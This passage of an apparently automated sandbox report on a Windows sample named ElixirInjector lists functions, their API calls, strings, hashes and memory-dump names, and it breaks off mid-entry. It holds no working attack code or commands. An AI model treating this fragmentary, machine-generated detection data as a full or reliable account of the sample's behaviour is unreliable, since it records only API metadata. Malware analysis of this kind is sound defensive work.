GetCurrentProcessId.KERNEL32 ref: 00F20DA8
AttachConsole.KERNEL32(00000000), ref: 00F20DAF
_wcslen.LIBCMT ref: 00F20DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00F20DD5
WriteConsoleW.KERNEL32(00000000), ref: 00F20DDC
Sleep.KERNEL32(00002710), ref: 00F20DE7
FreeConsole.KERNEL32 ref: 00F20DED
ExitProcess.KERNEL32 ref: 00F20DF5

Strings

dwmapi.dll, xrefs: 00F20927, 00F20D0D
SetDefaultDllDirectories, xrefs: 00F208B9
kernel32, xrefs: 00F20873
DXGIDebug.dll, xrefs: 00F208FC, 00F20C5E
uxtheme.dll, xrefs: 00F20D17
SetDllDirectoryW, xrefs: 00F20888
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00F20D84

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: da79c9d887e06f726508db82d44f7987cd77d8338719ac9a7110a2ef79d5258d
Instruction ID: 302c099bafcd933f7d7ec85799cfed322722df9f7bb8dcd2de28c952eb014e64
Opcode Fuzzy Hash: da79c9d887e06f726508db82d44f7987cd77d8338719ac9a7110a2ef79d5258d
Instruction Fuzzy Hash: BED1C3B1448394ABD331DF54DC49BDFBEE8BF85308F50091DFA85A6142CBB49648EB62

Function 00F2C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00F2C744

Part of subcall function 00F2B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00F2B3FB

_wcslen.LIBCMT ref: 00F2CA0A
_wcslen.LIBCMT ref: 00F2CA13
SetWindowTextW.USER32(?,?), ref: 00F2CA71
_wcslen.LIBCMT ref: 00F2CAB3
_wcsrchr.LIBVCRUNTIME ref: 00F2CBFB
GetDlgItem.USER32(?,00000066), ref: 00F2CC36
SetWindowTextW.USER32(00000000,?), ref: 00F2CC46
SendMessageW.USER32(00000000,00000143,00000000,00F5A472), ref: 00F2CC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F2CC7F

Strings

ProgramFilesDir, xrefs: 00F2CB45
Software\Microsoft\Windows\CurrentVersion, xrefs: 00F2CB1A
<br>, xrefs: 00F2C9D4
%s.%d.tmp, xrefs: 00F2C940

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: db236e3283842e6b1e1c5c01c052a754aa846e10027d276a9a9dc412806677a6
Instruction ID: 809c29c153c1390d43a16f71e78711d35262289fea013044316c9c087dac4b17
Opcode Fuzzy Hash: db236e3283842e6b1e1c5c01c052a754aa846e10027d276a9a9dc412806677a6
Instruction Fuzzy Hash: 7FE16772D00229AADF24DBA4EC85EEE77BCAB04350F4441A5F909E7051EF749F84AF61

Function 00F1DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F1DA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00F1DAAC

Part of subcall function 00F1C29A: _wcslen.LIBCMT ref: 00F1C2A2

Part of subcall function 00F205DA: _wcslen.LIBCMT ref: 00F205E0

Part of subcall function 00F21B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00F1BAE9,00000000,?,?,?,000103D8), ref: 00F21BA0

_wcslen.LIBCMT ref: 00F1DDE9
__fprintf_l.LIBCMT ref: 00F1DF1C

Strings

@%s:, xrefs: 00F1DF06, 00F1DF12
a, xrefs: 00F1DC16
RTL, xrefs: 00F1DEDE
*messages***, xrefs: 00F1DBFA
,, xrefs: 00F1DF57
*messages***, xrefs: 00F1DBC1
, xrefs: 00F1DD6C
R, xrefs: 00F1DC0C
$%s:, xrefs: 00F1DEFF

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: 6986ec4609537ddce53eeb7fc6e6ffaf4f338294f2b2096a931ffd590e13514e
Instruction ID: e059e4d476a54d3a40cbec1c7ec2f644f49dedde36f6e71d0933f0f9b5963d66
Opcode Fuzzy Hash: 6986ec4609537ddce53eeb7fc6e6ffaf4f338294f2b2096a931ffd590e13514e
Instruction Fuzzy Hash: F732CF72900218AACF24EF68CC41BEA77B5FF18720F44451AFD05A7291EBB5D9C5EB90

Function 00F2D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F2B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F2B579
Part of subcall function 00F2B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F2B58A
Part of subcall function 00F2B568: IsDialogMessageW.USER32(000103D8,?), ref: 00F2B59E
Part of subcall function 00F2B568: TranslateMessage.USER32(?), ref: 00F2B5AC
Part of subcall function 00F2B568: DispatchMessageW.USER32(?), ref: 00F2B5B6

GetDlgItem.USER32(00000068,00F6FCB8), ref: 00F2D4E8
ShowWindow.USER32(00000000,00000005,?,?,?,00F2AF07,00000001,?,?,00F2B7B9,00F4506C,00F6FCB8,00F6FCB8,00001000,00000000,00000000), ref: 00F2D510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00F2D51B
SendMessageW.USER32(00000000,000000C2,00000000,00F435F4), ref: 00F2D529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F2D53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00F2D559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F2D59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00F2D5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00F2D5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00F2D5E1
SendMessageW.USER32(00000000,000000C2,00000000,00F443F4), ref: 00F2D5F0

Strings

\, xrefs: 00F2D549

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 42c4c9833d41787bfb43f596faec271e4680b2227245dc09f5944bab49a96d14
Instruction ID: 57108fce7bdee11f507b067490545304801b1504a0ca6ccb93a4fee395838419
Opcode Fuzzy Hash: 42c4c9833d41787bfb43f596faec271e4680b2227245dc09f5944bab49a96d14
Instruction Fuzzy Hash: DF31D37114935ABFD301DF20EC4BFAB7FACEB82719F000908FA9596190DB649A05A777

Function 00F2D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00F2D7AE
ShellExecuteExW.SHELL32(?), ref: 00F2D8DE
ShowWindow.USER32(?,00000000), ref: 00F2D91D
GetExitCodeProcess.KERNEL32(?,?), ref: 00F2D959
CloseHandle.KERNEL32(?), ref: 00F2D97F
ShowWindow.USER32(?,00000001), ref: 00F2D9E1

Strings

.exe, xrefs: 00F2D989
.inf, xrefs: 00F2D89A

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: dc87736288321e52ca0cf07cb51f6c08567c4885d5299b4026ab66f8857430f4
Instruction ID: 2a6bda6a5f347f7857564b7f70de621b70eac9fd1342023727b706df4a73fefa
Opcode Fuzzy Hash: dc87736288321e52ca0cf07cb51f6c08567c4885d5299b4026ab66f8857430f4
Instruction Fuzzy Hash: C051E5718043A4AAEB309F24B844BAB7BE5AF85764F04041EF9C4971A1D7B5CDC4FB52

Function 00F3A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00F357FB,00F357FB,?,?,?,00F3ABAC,00000001,00000001,2DE85006), ref: 00F3A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00F3ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00F3AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00F3AB35
__freea.LIBCMT ref: 00F3AB42

Part of subcall function 00F38E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F34286,?,0000015D,?,?,?,?,00F35762,000000FF,00000000,?,?), ref: 00F38E38

__freea.LIBCMT ref: 00F3AB4B
__freea.LIBCMT ref: 00F3AB70

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: d3b1826a8b1f92a4e684398a4e2b177e03350833bcb590123b4182d27b219513
Instruction ID: 2b9a699e136fe62d2b7d1916482a4214ba4449c549bd0518b4e66b4f150faad6
Opcode Fuzzy Hash: d3b1826a8b1f92a4e684398a4e2b177e03350833bcb590123b4182d27b219513
Instruction Fuzzy Hash: FC51D472A10216AFDF258F66CC41FBBB7AAEB84770F154628FC44D6150EB38DC50E6A1

Function 00F33B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,00F33C35,00000000,00000FA0,00F72088,00000000,?,00F33D60,00000004,InitializeCriticalSectionEx,00F46394,InitializeCriticalSectionEx,00000000), ref: 00F33C03

Strings

api-ms-, xrefs: 00F33BC3

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 1ce810a3474ba60c064102f885b0c7df1cd0c18bd2f62c4895f2f0c2d1a47c99
Instruction ID: 28835f622f20b0be89ff486fb0e921a5395d76402a62668f717ffe82cae744a7
Opcode Fuzzy Hash: 1ce810a3474ba60c064102f885b0c7df1cd0c18bd2f62c4895f2f0c2d1a47c99
Instruction Fuzzy Hash: 2B11C636E45625ABCB22CB689C41B5DB7A49F52770F250210ED15FB290E770EF00A6D1

Function 00F198E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00F17760,?,00000005,?,00000011), ref: 00F1995F
GetLastError.KERNEL32(?,?,00F17760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F1996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00F17760,?,00000005,?), ref: 00F199A2
GetLastError.KERNEL32(?,?,00F17760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F199AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00F17760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F199F9

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: b3dcdcb22e04ba46fb41384dac70bfe96cb66434342466df98cefadf5efa63ca
Instruction ID: 00519baa711163102d6f3b7187949fa3625001d0740c2a1c3795e8888f872bf5
Opcode Fuzzy Hash: b3dcdcb22e04ba46fb41384dac70bfe96cb66434342466df98cefadf5efa63ca
Instruction Fuzzy Hash: 533123309483456FE7309F24CC46BDABBA8BB01334F200B1DF9A1961C0D3E5A984EBD1

Function 00F2B568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F2B579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F2B58A
IsDialogMessageW.USER32(000103D8,?), ref: 00F2B59E
TranslateMessage.USER32(?), ref: 00F2B5AC
DispatchMessageW.USER32(?), ref: 00F2B5B6

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: fbfbf4fe227d9986c3edbbc62e12c6a359293bab96687f0c7cf3c98068d3f440
Instruction ID: 0d19bfaa9615c34d5dc3360aa30a8e1e02315fb3c809c9c0db18405f9a09ff54
Opcode Fuzzy Hash: fbfbf4fe227d9986c3edbbc62e12c6a359293bab96687f0c7cf3c98068d3f440
Instruction Fuzzy Hash: 34F01D71E0122EBB8B209BE1AC4DDDB7FACEE053A57004424B909D2014EB34D646EBB1

Function 00F2ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00F2ABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 00F2ABF9

Part of subcall function 00F21FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00F1C116,00000000,.exe,?,?,00000800,?,?,?,00F28E3C), ref: 00F21FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00F2ABE9

Strings

EDIT, xrefs: 00F2ABCD, 00F2ABD8, 00F2ABE5

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 46f14dbc4cc95f2e84370a2b3c1c7aeb77d9d1a6487c6e41496cf27be7989524
Instruction ID: 4861cd5141d88be630957d10946514ba890981dce5558160fd9d7fba218f2b02
Opcode Fuzzy Hash: 46f14dbc4cc95f2e84370a2b3c1c7aeb77d9d1a6487c6e41496cf27be7989524
Instruction Fuzzy Hash: 42F08232A0023877DB306624AC09F9B766C9B86B50F484011BA05F2180D764EA85E5B6

Function 00F2AC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00F2081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F20836
Part of subcall function 00F2081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F1F2D8,Crypt32.dll,00000000,00F1F35C,?,?,00F1F33E,?,?,?), ref: 00F20858

OleInitialize.OLE32(00000000), ref: 00F2AC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00F2AC66
SHGetMalloc.SHELL32(00F58438), ref: 00F2AC70

Strings

riched20.dll, xrefs: 00F2AC1E

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: 98ffd6257ca40bb0606ccfab4ea4e6f70180407a27cc76af8c8f5a6d5895ec46
Instruction ID: e2fdffeafe502a297e5aac5fa7615e6389161d710e6c4345df830414d057ebda
Opcode Fuzzy Hash: 98ffd6257ca40bb0606ccfab4ea4e6f70180407a27cc76af8c8f5a6d5895ec46
Instruction Fuzzy Hash: 2DF0FFB1D00219ABCB10AFA9DC499DFFFFCEF84705F00415AA815A2241DBB45645ABA2

Function 00F19785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00F19795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00F197AD
GetLastError.KERNEL32 ref: 00F197DF
GetLastError.KERNEL32 ref: 00F197FE

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 891f5515eec7f371cb5da096d5ea450252918dc41c8b2af64f3a3da6b4f25ba2
Instruction ID: 7171770d8ac1b8db4f6b91d75286c3bcde96aa4b5eb3a2a7af875524fda30e87
Opcode Fuzzy Hash: 891f5515eec7f371cb5da096d5ea450252918dc41c8b2af64f3a3da6b4f25ba2
Instruction Fuzzy Hash: 4311A035D18204EBCF205F28C8146E937A9BF12734F108A29E816851D0D7F59EC4FBE1

Function 00F3AD34 Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00F340EF,00000000,00000000,?,00F3ACDB,00F340EF,00000000,00000000,00000000,?,00F3AED8,00000006,FlsSetValue), ref: 00F3AD66
GetLastError.KERNEL32(?,00F3ACDB,00F340EF,00000000,00000000,00000000,?,00F3AED8,00000006,FlsSetValue,00F47970,FlsSetValue,00000000,00000364,?,00F398B7), ref: 00F3AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F3ACDB,00F340EF,00000000,00000000,00000000,?,00F3AED8,00000006,FlsSetValue,00F47970,FlsSetValue,00000000), ref: 00F3AD80

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 721b208d3c070e6d20a2c5a697c4580a5616ca79f761f0f19c94bbc59f1c3759
Instruction ID: da0761ae11c790cdc387a76a20628a8b32e3339e9f99691ed5c3ed1f30330ee7
Opcode Fuzzy Hash: 721b208d3c070e6d20a2c5a697c4580a5616ca79f761f0f19c94bbc59f1c3759
Instruction Fuzzy Hash: BD01F73A60122AABC7214B6A9C48A577BA8EF167B2F110724FD46D3650D720D901A6E1

Function 00F2101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00F21043
SetThreadPriority.KERNEL32(?,00000000), ref: 00F2108A

Part of subcall function 00F16C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F16C54

Strings

CreateThread failed, xrefs: 00F2104F

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
